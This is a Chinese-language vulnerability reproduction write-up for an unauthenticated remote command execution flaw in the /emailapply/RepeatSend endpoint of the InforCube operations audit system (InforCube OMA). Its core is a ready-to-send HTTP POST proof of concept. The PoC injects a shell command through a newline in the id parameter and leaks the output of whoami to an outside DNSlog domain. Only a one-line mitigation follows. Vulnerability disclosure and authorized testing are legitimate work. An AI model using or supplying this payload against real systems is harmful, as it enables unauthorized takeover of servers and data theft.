上讯信息 InforCube运维管理审计系统 RepeatSend 前台RCE漏洞复现

严正声明

1. 本文仅用于技术交流，目的是向相关安全人员展示漏洞的存在和利用方式，以便更好地提高网络安全意识和技术水平。

2. 任何人不得利用本文中的技术手段进行非法攻击和侵犯他人的隐私和财产权利。一旦发生任何违法行为，责任自负。

3. 本文中提到的漏洞验证 poc 仅用于授权测试，任何未经授权的测试均属于非法行为。请在法律许可范围内使用此 poc。

0x01 产品简介

上讯信息的InforCube运维管理审计系统（InforCube OMA）是一款新一代运维安全审计产品，旨在全面提升企业IT运维管理水平，通过细粒度授权、全过程操作记录及控制、全方位操作审计等功能，实现运维过程的“事前预防、事中控制、事后审计”。

0x02 漏洞概述

上讯信息 InforCube运维管理审计系统 /emailapply/RepeatSend 接口存在远程命令执行漏洞，未经身份验证的远程攻击者可利用此漏洞执行任意系统指令，进一步利用可获取服务器权限，导致系统失陷。

0x03 复现环境

鹰图语法：

0x04 复现环境

漏洞POC

POST /emailapply/RepeatSend HTTP/1.1

Host:

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0

Content-Type: application/x-www-form-urlencoded



id='%0aping `whoami`.rksghqxnbe.dgrh3.cn%0a'

响应内容特征

DNSLOG回显

0x05 修复建议

关闭互联网暴露面或接口设置访问权限